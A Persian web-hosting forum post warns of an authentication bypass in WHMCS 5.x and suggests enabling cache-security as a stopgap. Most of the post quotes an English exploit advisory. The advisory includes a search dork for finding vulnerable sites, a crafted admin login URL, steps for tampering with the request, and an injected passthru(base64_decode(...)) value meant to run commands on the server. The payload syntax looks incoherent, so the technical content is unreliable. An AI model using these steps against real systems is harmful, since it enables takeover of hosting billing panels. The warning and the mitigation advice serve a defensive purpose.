نمایش نتایج: از شماره 1 تا 10 , از مجموع 16

موضوع: مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

Threaded View

پست قبلی پست قبلی   پست بعدی پست بعدی
  1. #1
    عضو انجمن secure_host آواتار ها
    تاریخ عضویت
    Nov 2008
    نوشته ها
    586
    تشکر تشکر کرده 
    171
    تشکر تشکر شده 
    1,382
    تشکر شده در
    508 پست

    Post مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

    با سلام
    مشکل امنیتی جدیدی در WHCS ورژن 5 وجود دارد که باعث می شود شخص نفوذگر به صفحه ادمین دسترسی پیدا کند.

    راه کار : تا ارایه Patch از ناحیه WHMCS می توانید قابلیت cache-security را در WHMCS خود فعال نمایید . گفتنی است که امکان cache-security به صورت پیش فرض بر روی whmcs 5.1 فعال می باشد.
    اطلاعات تکمیلی :
    WHMCS 5.x Authentication Bypass - CXSecurity WLB
    WHMCS 5.x versions suffers from a cookie-validation vulnerability, where sessions can be modified and authentication can
    be easily bypassed.

    ##################################################
    # Description : WHMCS 5.x Authentication Bypass Vulnerability
    # Author : Agd_Scorp
    # Contact: vorscorp@hotmail.com
    # Version : 5.x
    # Link : Order Now - WHMCS
    # Date : Monday, December 31, 2012
    # Dork : intext:Powered by WHMCompleteSolution
    ##################################################

    Recommended: You must have BEeF or Tamper Data already installed, I do not recommend doing this process manually.

    # The Fact:

    WHMCS
    5.0 is completely vulnerable to this vulenrability, but in 5.1 version,
    WHMCS has added extra cache-security, so I've added an extra-payload
    for it, you can do the exploitation-process without the payload in the
    5.0 version.


    # The Exploitation

    http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}

    after
    you have successfully entered that into your browser, the page will lag
    for abit due to the cache-validation, which we, ofcourse, will change
    it. ;-)


    when the page is loading, quickly open Tamper Data and change the loading POST_SESSION request & the payload to
    this:

    POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";

    Payload: $payload = "login=1&title=1&execorder=0&hook=urlencoded&redir ect={admin_index}";


    # The Result

    Once
    you have done this process, you will be automatically be redirected to
    the admin page, although, if the administrator has enabled
    cache-security, this process will fail.

    # Solution & Fix

    No solution & fix, just wait for the WHMCS team to release a patch for this vulnerability.
    ارایه دهنده خدمات ایمن سازی سرور های مبتنی بر لینوکس و ویندوز
    My Crime Is My Advisory . Hacking Is The Best But Security Is The First

    The Best Secure Hosting in Iran http://SecureHost.ir

    جهت تماس در شبکه IRC :mHUB.HIRCNetwork.com#Linux@Secure_Host

  2. تعداد تشکر ها ازsecure_host به دلیل پست مفید


اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. آپدیت به نسخه جدید و تنظیمات امنیتی whmcs
    توسط aminh03 در انجمن سوالات و مشکلات
    پاسخ ها: 1
    آخرين نوشته: July 2nd, 2017, 19:24
  2. پاسخ ها: 3
    آخرين نوشته: April 4th, 2014, 14:31
  3. اپدیت امنیتی whmcs
    توسط mhiizadi در انجمن مباحث و منابع آموزش
    پاسخ ها: 1
    آخرين نوشته: March 25th, 2014, 17:04
  4. پاسخ ها: 9
    آخرين نوشته: May 18th, 2013, 08:45
  5. پاسخ ها: 27
    آخرين نوشته: April 26th, 2013, 20:02

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •